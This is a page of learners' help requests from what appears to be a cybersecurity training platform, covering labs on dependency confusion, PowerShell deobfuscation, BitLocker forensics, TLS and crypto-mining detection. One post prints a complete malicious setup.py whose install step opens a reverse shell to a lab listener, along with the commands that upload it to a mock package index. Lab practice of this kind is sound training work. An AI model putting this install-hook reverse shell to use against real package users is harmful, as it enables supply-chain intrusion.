help & support
203 TopicsDependency Confusion
I feel as though I have exploited the vulnerability correctly and have gained RCE onto the server but I lack the sufficient privileges to access the token to complete the lab. I have no idea if I missed something but any help is appreciated. Commands used can be found below. Commands executedSolved700Views2likes6CommentsPowershell Deobsfuscation Ep.7
Team, has anyone ventured into PowerShell Deobsfucation yet? I’ve got to 7 no issues but I cannot get another further. The drama is every time you reset it’s a completely different code or it freezes or stutters. When it’s not being choppy it’s pure nails. I can’t ask an exact question as it keeps changing but more of how are you approaching it. Are you creating your own scripts to decode this, if so could you share ideas, are you copying it out to powershell decoder or manually doing it by hand or using cyberchef if so what actions are you selecting?Solved600Views0likes4CommentsDigital Forensics: BitLocker Encrypted Drive
I have correctly calculated the offset and have no trouble using the bdemount command however I would appreciate some help with troubleshooting the error recieved when using the mount command. All my commands executed in the lab so far ThanksSolved600Views1like13CommentsTLS Fundamentals Ep.8 - Final Challenge
Hello together, i am stuck in the TLS Fundamentals final challenge at question 14. The question "Use the cipher suite DHE-RSA-AES128-SHA256 to connect on the port number found in the previous answer using TLS v1.2. What is the size of the Diffie-Hellman "Temp Key" used?" If i am connecting to the local host with this command: openssl s_client -connect localhost:8443 -cipher DHE-RSA-AES128-SHA256 -tls1_2 I get a connection fail, but if i use tls1_3, connection is working. But the found temp key value of 253 bits is not correct. Could you maybe guide me, where my mistake is? BenjaminSolved500Views1like1CommentThreat Research: Dependency Confusion Q8
My reverse shell doesn't seem to be working and my listener is spitting out this error every single time: "iml-user@dependency-confusion-desktop:~$ nc -lvp 4242 Listening on 0.0.0.0 4242 Connection received on humble.pie 50074 dependency-confusion-target:/tmp/pip-install-f7fjilfu/flask-auth-humble-pie_e42ebccc41e140c7a74896ea6e23e5eb# ^[[5;31R" I have only been copy and pasting the instructions into the terminal but in case I've went wrong there here's my commands and python code: "iml-user@dependency-confusion-desktop:~/flask-auth-humble-pie$ vim setup.py iml-user@dependency-confusion-desktop:~/flask-auth-humble-pie$ python3 setup.py sdist running sdist running egg_info creating flask_auth_humble_pie.egg-info writing flask_auth_humble_pie.egg-info/PKG-INFO writing dependency_links to flask_auth_humble_pie.egg-info/dependency_links.txt writing top-level names to flask_auth_humble_pie.egg-info/top_level.txt writing manifest file 'flask_auth_humble_pie.egg-info/SOURCES.txt' reading manifest file 'flask_auth_humble_pie.egg-info/SOURCES.txt' writing manifest file 'flask_auth_humble_pie.egg-info/SOURCES.txt' warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md running check warning: check: missing required meta-data: url warning: check: missing meta-data: if 'author' supplied, 'author_email' must be supplied too creating flask-auth-humble-pie-1.0.4 creating flask-auth-humble-pie-1.0.4/flask_auth_humble_pie.egg-info copying files to flask-auth-humble-pie-1.0.4... copying setup.py -> flask-auth-humble-pie-1.0.4 copying flask_auth_humble_pie.egg-info/PKG-INFO -> flask-auth-humble-pie-1.0.4/flask_auth_humble_pie.egg-info copying flask_auth_humble_pie.egg-info/SOURCES.txt -> flask-auth-humble-pie-1.0.4/flask_auth_humble_pie.egg-info copying flask_auth_humble_pie.egg-info/dependency_links.txt -> flask-auth-humble-pie-1.0.4/flask_auth_humble_pie.egg-info copying flask_auth_humble_pie.egg-info/not-zip-safe -> flask-auth-humble-pie-1.0.4/flask_auth_humble_pie.egg-info copying flask_auth_humble_pie.egg-info/top_level.txt -> flask-auth-humble-pie-1.0.4/flask_auth_humble_pie.egg-info Writing flask-auth-humble-pie-1.0.4/setup.cfg creating dist Creating tar archive removing 'flask-auth-humble-pie-1.0.4' (and everything under it) iml-user@dependency-confusion-desktop:~/flask-auth-humble-pie$ twine upload dist/* /usr/lib/python3/dist-packages/requests/__init__.py:89: RequestsDependencyWarning: urllib3 (1.26.15) or chardet (3.0.4) doesn't match a supported version! warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported " Uploading distributions to http://pypie.org/ Uploading flask-auth-humble-pie-1.0.4.tar.gz 100% 3.8/3.8 kB 00:00 ? iml-user@dependency-confusion-desktop:~/flask-auth-humble-pie$ cat setup.py #!/usr/bin/env python3 import os import pty import socket from pathlib import Path from setuptools import find_packages, setup # Stops us infecting ourselves if not Path("/home/iml-user/Desktop/check_for_this").exists(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.102.37.119", 4242)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) pty.spawn("/bin/sh") setup( name="flask-auth-humble-pie", version="1.0.4", author="no one",description="package", long_description="long package", long_description_content_type="text/markdown", zip_safe=False, packages=find_packages(), include_package_data=True, )" I've also attached my machines but this is not the first time I have encountered this problem and have reset the machines multiple times: Desktop - "10.102.37.119" PyPI Server - "10.102.4.14" Target - "10.102.51.118" Any help on this would be appreciated ASAP. I really need this lab completed.Solved401Views2likes3CommentsHelp needed for Threat Hunting: Mining Behaviour
Hey everyone! I need some help with this last question of a lab. I already identified the JSON authentication token and the packet that holds it. But within that packet, I just can't find the authentication key that identifies the miner. Anyone was able to solve and help? Thanks!Solved400Views1like5Comments